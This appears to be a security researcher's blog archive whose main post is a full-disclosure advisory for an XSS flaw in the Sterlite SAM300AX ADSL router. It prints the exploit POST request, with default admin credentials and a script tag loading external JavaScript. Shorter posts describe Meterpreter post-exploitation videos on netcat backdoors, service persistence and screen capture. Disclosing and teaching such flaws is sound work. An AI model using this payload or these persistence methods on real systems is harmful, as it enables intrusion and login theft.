Saturday, February 6, 2010

Sterlite SAM300AX ADSL router Cross Site Scripting (XSS)


Well, I reported XSS in Sterlite router on Feb 5, 2010.

Sterlite SAM300AX is used by broadband customers in Delhi and Mumbai, India. Given the customer base of MTNL in these 2 metro cities, this vulnerability may be extremely useful for an attacker and / or a bot herder looking for new bots.

After waiting for vendor response 2 weeks +, I decided to publish this to Full Disclosure/publicly.


Sharing the vuln POST request and parameters here:

POST Request
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101
POST Parameters
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

Screenshots
 

 

Impact
Remote script / code execution, login theft n other nasty things.
##########
Vulnerability Found: January 19, 2010 
Vendor First Notified: January 20, 2010 
Vendor Response: None 
Follow Up Notification: January 27, 2010 
Vendor Response: None 
Public Disclosure: February 05, 2010 
##########

You can read the full details here:
http://secunia.com/advisories/38463/

Sunday, January 10, 2010

Poll: Brand Value vs Role Relevance



Hi all,
We come across this choice at one or later point in our (experienced) professional lives:
Brand recognition of the organization OR Kind of role to perform.
Over the years, I have observed that the resources (people) don't give much consideration deciding on this. Most of those (I knew, personally and through others) gave preference to the 'brand name' before considering the 'role relevance'. The idea of gaining value on CV from the brand name of organization monopolies over the scope of learning, quality of work, & more importantly following one's passion. Of course, this is just my observation based on past few years and a HR person could better complement or debate it in present standings.


Nevertheless, I wanted to see what choice you may make. Hence this poll.
Would you rather stick to an organization who has a strong brand value but which offers you a mix of work responsibilities that may or may NOT be related to your core expertise?
OR
Would you go ahead with any decent organization which may not be as glamorous as the former but successfully gives you a definite, clearly-defined role in your core domain(s)?


What do I think? I believe in and pursue what I am passionate about. I prefer to do things who'd push me to learn stuff every day; be it reading new vulnerabilities, exploits or new papers on bot design. I love doing it & I learn along the way.


When we make our passion -> our work, success, money & every thing else will follow automatically. 


Therefore, though brand names are important, for such organizations have good processes, training opportunities, number of projects etc., if they do not offer roles facilitating one's career vision, they wouldn't matter much.


I will chose quality work over a 'role soup' any day. But that's just me :)


The poll is on the left-hand sidebar of this blog. Please participate in this poll & share your opinions though post comments. It would be great to know if the trend has changed in recent years...


Best Regards..

Tuesday, January 5, 2010

Saturday, December 12, 2009

ASCII Chart

ASCII chart comes handy to me at times. So instead of searching for it when needed, I thought I should put it here. Might as well help smeone else.




Thursday, December 10, 2009

Meterpreter Post Exploitation -> Setting up a Netcat backdoor.

Using Metasploit Meterpreter to modify target's registry and configure a persistent netcat listener.

Comments & feedback are Welcome.



Best Regards.

Installing Meterpreter as a Service VoD

Watch & learn how, post-exploitation, an attacker may choose to install Meterpreter as a service on the exploited host for ensuring access at a later point in time.

Comments & feedback are Welcome.



Best Regards.

Meterpreter Post Exploitation -> Using ESPIA for Screen Capture

Using Meterpreter extension ESPIA post-exploitation to take screenshots of the victim's desktop.

Comments and feedback are Welcome.



Best Regards.